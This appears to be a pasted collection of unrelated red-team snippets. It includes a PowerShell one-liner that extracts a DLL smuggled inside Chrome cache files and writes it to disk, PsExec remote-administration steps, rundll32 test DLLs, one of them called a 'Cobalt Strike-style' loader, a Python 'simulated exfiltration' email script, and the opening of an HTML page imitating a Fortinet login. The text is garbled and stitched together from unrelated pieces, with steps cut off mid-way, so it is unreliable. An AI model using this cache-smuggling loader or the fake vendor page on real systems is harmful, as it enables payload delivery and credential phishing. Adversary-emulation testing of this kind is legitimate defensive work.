Toussaint Louverture justaguywhocodes
$d="$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cache\Cache_Data\"; if (Test-Path $d) { gci $d -File | ForEach-Object { try { $s = [System.Text.Encoding]::Default.GetString([System.IO.File]::ReadAllBytes($_.FullName)); if ($s -match '(?s)INDLL(?<content>.*?)OUTDLL') { [System.IO.File]::WriteAllBytes("$d\hello.dll", [System.Text.Encoding]::Default.GetBytes($matches['content'])); Write-Host " found in $($_.Name). Extracted to $d\hello.dll"; break } } catch { Write-Warning "Error processing $($_.Name): $_" } }; if (!$?) { Write-Host "No matches found" } }
Step 0: Prerequisites - Enable Remote Administration on the Remote Machine
We need to ensure the remote machine allows remote administration. We'll do the following:
0.1 Enable the File and Printer Sharing (SMB) and Remote Administration exceptions in Windows Firewall.
We can use netsh to enable the firewall rules. We'll run these commands on the remote machine. Since we are testing, we can use PsExec to run these commands remotely.
Note: This step might already be done in your environment. If you are in a lab and the firewall is off, you can skip it. But for completeness:
cmd
// testdll.c
// Simple Windows DLL that exports a function compatible with rundll32.exe
// When called via rundll32.exe testdll.dll,ExecuteTest
// it writes "test executed" to C:\Users\Public\Downloads\test.txt
#include <windows.h>
#include <stdio.h>
// Exported function (rundll32-compatible signature).
// extern "C" is only valid in C++, so guard it so the file also compiles as plain C.
#ifdef __cplusplus
extern "C"
#endif
__declspec(dllexport) void CALLBACK ExecuteTest(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
    FILE *f = fopen("C:\\Users\\Public\\Downloads\\test.txt", "w");
    if (f) { fputs("test executed", f); fclose(f); }
}
https://www.visualcapitalist.com/wp-content/uploads/2023/08/global-economy-2023-1200px.jpg
Step-by-Step Commands
Install the PowerForensics Module (if not installed):
powershell
Install-Module -Name PowerForensics -Force -Confirm:$false -Scope CurrentUser
Create a Test File (e.g., C:\test\malicious.txt):
powershell
import smtplib
from email.mime.text import MIMEText
# CONFIGURATION (TEST CREDENTIALS ONLY)
sender_email = "[email protected]" # Use a dedicated TEST account
password = "yourpassword" # Generate an App Password: https://myaccount.google.com/apppasswords
receiver_email = "[email protected]" # Destination
smtp_server = "smtp.gmail.com"
port = 587 # TLS port
message = "Simulated TrillClient data exfiltration test."
1. Create a Test DLL Loader
Simulate a benign Cobalt Strike-style DLL loader. Save this as test_loader.c:
c
#include <windows.h>
// Export a function (common in Cobalt Strike loaders)
__declspec(dllexport) void Run(void) {
    // Benign test action: create a temporary file
    HANDLE hFile = CreateFileA("C:\\Windows\\Temp\\test_ttp_success.txt",
                               GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
                               FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile != INVALID_HANDLE_VALUE) CloseHandle(hFile);
}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Fortinet Secure File Access</title>
<style>
body {
margin: 0;
padding: 0;